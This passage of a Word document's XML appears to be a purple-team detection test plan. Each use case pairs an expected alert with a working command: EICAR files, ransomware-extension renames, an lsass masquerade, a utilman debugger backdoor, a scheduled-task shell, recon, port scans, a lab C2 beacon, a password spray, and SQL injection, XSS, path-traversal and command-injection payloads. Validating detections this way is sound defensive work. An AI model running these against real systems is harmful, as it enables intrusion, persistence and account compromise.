          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$e='X5O!P%@AP[4'+'\PZX54(P^)7CC)7}'+'$EICAR-STANDARD-'+'ANTIVIRUS-TEST-FILE!$H+H*'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Content "$env:TEMP\eicar.com" -Value $e -Encoding Ascii</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get-Content "$env:TEMP\eicar.com"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: EDR raises a malware detection named EICAR-Test-File. If the file is deleted on creation, record as prevented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Remove the file after testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2  Multiple AV infections on one host (UC0149)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create several EICAR files so multiple detections are raised for a single host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1..5 | ForEach-Object { Set-Content "$env:TEMP\eicar_$_.com" -Value $e -Encoding Ascii }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Two or more malware detections on the same host within a short window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3  Ransomware extensions (UC0125)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rename a set of files to well-known ransomware extensions and drop a ransom note.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$dir="$env:TEMP\ransom"; New-Item -ItemType Directory -Force $dir | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$ext='.locky','.crypt','.encrypted','.wncry','.cerber'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1..20 | ForEach-Object { $f="$dir\doc$_.txt"; 'x'|Set-Content $f; Rename-Item $f "$dir\doc$_$($ext[$_ % $ext.Count])" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Alert on mass file-rename to ransomware extensions and ransom-note creation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.4  APT process creation – masquerading (UC0036)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy the command shell to a system-process name in a non-standard location and run it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy-Item C:\Windows\System32\cmd.exe C:\Windows\Temp\lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Start-Process C:\Windows\Temp\lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Process-creation alert for lsass.exe running from a non-system path. If terminated on launch, record as prevented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.5  Application spawning a shell (UC0182)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the Windows Script Host to spawn a command shell, reproducing the parent-to-child pattern of a malicious document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Content "$env:TEMP\u.vbs" 'CreateObject("WScript.Shell").Run "cmd.exe /c whoami"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wscript.exe "$env:TEMP\u.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Process-creation alert where wscript.exe is the parent of cmd.exe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.6  Abuse of accessibility binaries (UC0185)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set a debugger value on an accessibility binary via the registry. The registry change is the detection point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Registry-modification alert on the accessibility binary's Image File Execution Options key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: If the key does not persist when queried immediately afterwards, endpoint protection has stripped it – record as prevented. Remove the key after testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.7  Scheduled task spawning a shell (SPLUC0187)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create and run a scheduled task that launches a command shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$a=New-ScheduledTaskAction -Execute 'cmd.exe' -Argument '/c whoami'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Register-ScheduledTask -TaskName 'uc0187' -Action $a -Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start-ScheduledTask -TaskName 'uc0187'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Alert on task creation and on the Task Scheduler service spawning cmd.exe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Remove the task with Unregister-ScheduledTask after testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.8  Threat activity – reconnaissance (UC0043)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run a short burst of discovery commands from one host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /all; net user; net group "domain admins" /domain; systeminfo; tasklist; nltest /domain_trusts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Alert on a burst of discovery activity from a single host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.  Network Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1  Horizontal port scan (UC0053)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to a single port across many hosts in a subnet. Where scanning tools are blocked, the native method below is used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$port=445; 1..254 | ForEach-Object { $ip="172.16.75.$_"; $t=New-Object Net.Sockets.TcpClient; $c=$t.BeginConnect($ip,$port,$null,$null); if($c.AsyncWaitHandle.WaitOne(120)){"$ip open"; try{$t.EndConnect($c)}catch{}}; $t.Close() }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Firewall alert for one source contacting the same port on many hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2  Vertical port scan (UC0054)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to many ports on a single target host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$ip='&lt;TARGET&gt;'; 1..1024 | ForEach-Object { $p=$_; $t=New-Object Net.Sockets.TcpClient; $c=$t.BeginConnect($ip,$p,$null,$null); if($c.AsyncWaitHandle.WaitOne(120)){"$p open"; try{$t.EndConnect($c)}catch{}}; $t.Close() }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Firewall alert for one source contacting many ports on one host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3  Prohibited port activity (UC0249)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt connections to ports prohibited by policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$ip='&lt;TARGET&gt;'; 23,6667,4444 | ForEach-Object { Test-NetConnection $ip -Port $_ -WarningAction SilentlyContinue | Select-Object RemotePort,TcpTestSucceeded }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Firewall or proxy alert for traffic to a prohibited port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4  Command-and-control traffic (UC0141)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host a simple listener on a second lab host and beacon to it at a regular interval. An inbound firewall rule is required on the listener, even on the same subnet, because Windows blocks unsolicited inbound traffic by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$c2='http://&lt;LAB_C2_HOST&gt;:8080/beacon'; 1..30 | ForEach-Object { try{ Invoke-WebRequest $c2 -UseBasicParsing -TimeoutSec 5 -Headers @{ 'User-Agent'='beacon' } | Out-Null }catch{}; Start-Sleep -Seconds 10 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Proxy or firewall alert for regular, repeated traffic to a single destination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5  Password spray (UC0046)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt one agreed password across many accounts. Agree the account list and password with the customer beforehand to avoid lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$users = Get-Content .\users.txt; $pw='&lt;AGREED_PASSWORD&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">foreach($u in $users){ cmd /c "net use \\&lt;DC&gt;\IPC$ /user:$u $pw" 2&gt;$null; Start-Sleep -Milliseconds 300 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Alert on many failed logons across distinct accounts from one source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">11.  Web Application Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web application use cases are tested against the in-scope application only. The key consideration is that a web application firewall or the application framework may block the payload before it reaches the application. When that happens the attack does not execute, so the behaviour-based outcome will not occur. This is recorded as a prevention. Always confirm whether the payload reached and ran in the application before concluding a result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">11.1  SQL injection (UC0228)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submit SQL injection patterns to the login form or to parameters that are used in database queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$u='https://&lt;WEBAPP&gt;/&lt;auth-endpoint&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin' OR '1'='1","admin'--","' OR 1=1--" | ForEach-Object { try{ Invoke-WebRequest $u -Method POST -Body @{userName=$_;password='x'} -UseBasicParsing }catch{} }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Web application firewall or SIEM alert for a SQL injection signature. A database error or authentication bypass indicates a potential vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">11.2  Web application exploit (UC0229)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submit common exploit patterns (cross-site scripting, path traversal, command injection) to parameters that accept them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$b='https://&lt;WEBAPP&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">'/?q=&lt;script&gt;alert(1)&lt;/script&gt;','/?file=../../../../windows/win.ini','/?cmd=;whoami' | ForEach-Object { try{ Invoke-WebRequest "$b$_" -UseBasicParsing -TimeoutSec 8 }catch{} }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Web application firewall or SIEM alert for the exploit signature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: If the framework or firewall blocks the payload, the exploit will not execute and no behavioural result will be seen. Record this as a prevention and verify the block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">12.  Email and DLP Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These use cases require a mailbox the team can send from and a monitored recipient mailbox, and for DLP, a monitored channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1  Suspicious attachment / mail malware (UC0222)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send an email with an EICAR attachment and a file with a risky extension to a monitored mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
